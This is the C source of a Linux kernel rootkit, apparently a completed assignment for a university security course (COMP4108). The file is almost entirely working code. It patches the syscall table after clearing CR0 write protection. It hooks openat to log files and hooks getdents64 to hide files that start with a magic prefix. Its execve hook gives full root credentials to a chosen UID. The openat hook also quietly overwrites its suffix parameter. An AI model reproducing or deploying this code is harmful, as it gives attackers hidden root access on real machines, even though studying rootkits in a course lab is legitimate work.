/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/cred.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif

#ifndef __NR_openat
#define __NR_openat 323
#endif
#ifndef __NR_execve
#define __NR_execve 11
#endif

#ifndef __NR_getdents64
#define __NR_getdents64 248
#endif

#define MODULE_NAME "rootkit"



// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/
static t_syscall original_execve; //* original excve 
static t_syscall original_getdents64; //* Store original getdents64 function
 

/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0); // to add the root_uid param 
MODULE_PARM_DESC(root_uid, "ROOT UID FOR PERMISSION ESCALATION received");

//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
static char* magic_prefix;
// magic_prefix ;
module_param(magic_prefix, charp, 0000);
MODULE_PARM_DESC(magic_prefix, "MAGIC PREFIX FOR HIDING FILES");


//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */


/* 
 * TODO: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix= "$sys$");
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}

asmlinkage int new_execve(const struct pt_regs *regs){
   // Declare our return value and a variable to store the filename
  char *filename;
  long ret;
  kuid_t euid; 


  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory
  if (!filename){
    return 0;
  }
  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void *) regs->di, 4096) < 0){
    kfree(filename);
    return 0;
  }

  euid = current_euid(); //get euid of curr process

  printk(KERN_INFO "EXECUTING: %s \n", filename);
  printk(KERN_INFO "EFFECTIVE UID %d \n", euid.val);

  //?Here is where we make the majority of the changes 
  // * if curr users eid matched root_uid, we grant root priviliges
  if (euid.val == root_uid){
    struct cred *new_creds; 

    //? here we make the new credentials  with root priv
    new_creds = prepare_kernel_cred(NULL);
    if (new_creds){
      new_creds->uid.val = 0;
      new_creds->gid.val = 0;
      new_creds->euid.val = 0;
      new_creds->egid.val = 0;

      //? here we save our changes
      commit_creds(new_creds);
      printk(KERN_INFO "ROOT ACCESS GRANTED TO UID %d \n", root_uid);

    }
  }

  kfree(filename);

  // Invoke the original execve syscall
  ret = original_execve(regs);

  return ret;
}

asmlinkage long new_getdents64(const struct pt_regs *regs){
  struct linux_dirent64 *dirp = (struct linux_dirent64 *) regs->si;
  struct linux_dirent64 *dirent_kernel_buff;

  // unsigned int count = (unsigned int) regs->dx; 
  // unsigned int fd = (unsigned int) regs->di;
  long ret;
  unsigned long offset = 0;
  struct linux_dirent64 *current_dir;
  struct linux_dirent64 *prev_dir = NULL;


  //? Here we call the original getdents64 syscall to get the dir ents 
  ret = original_getdents64(regs);
  if (ret <= 0) {
    return ret;  //? this happens because no entries are avail 
  }
  //* here we allocate the memory for the buffer to store  dir ents 
  dirent_kernel_buff = kmalloc(ret, GFP_KERNEL);
  if (!dirent_kernel_buff){
    return 0; //? Making sure that this is not empty 
  }

  //? grab cpy the buffer 
  if (copy_from_user(dirent_kernel_buff, dirp, ret)) {
    kfree(dirent_kernel_buff);
    return 0; 
  }
  printk(KERN_INFO "WE ARE INVOKING GETDENTS64 HERE.\n");

  //? HEre we are iterating through the buffer's dir ents
  while (ret > offset){
    current_dir = (struct linux_dirent64 *)((char *)dirent_kernel_buff + offset);
    if (strncmp(current_dir->d_name, magic_prefix, strlen(magic_prefix)) == 0) {
      if(prev_dir){
        prev_dir->d_reclen += current_dir->d_reclen;
      }
      else{
        ret -= current_dir->d_reclen;
        memmove(current_dir, (char *)current_dir + current_dir->d_reclen, ret - offset);
        continue;
      }
    }
    else{
      prev_dir = current_dir;
    }
    offset += current_dir->d_reclen;
  }
   //* deallocate memor
  if (copy_to_user(dirp, dirent_kernel_buff, ret)) {
    kfree(dirent_kernel_buff);
    return 0;
  }
 
  kfree(dirent_kernel_buff);
  return ret; 

}


/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];


  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
  __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */

  // Let's hook execve() for privilege excalation
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;

  // Let's hook getdents() to hide our files
  __sys_call_table[__NR_getdents64] = (unsigned long)new_getdents64;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
  __sys_call_table[__NR_openat] = (unsigned long)original_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;

  // Let's unhook and restore the original getdents() function
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;


  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
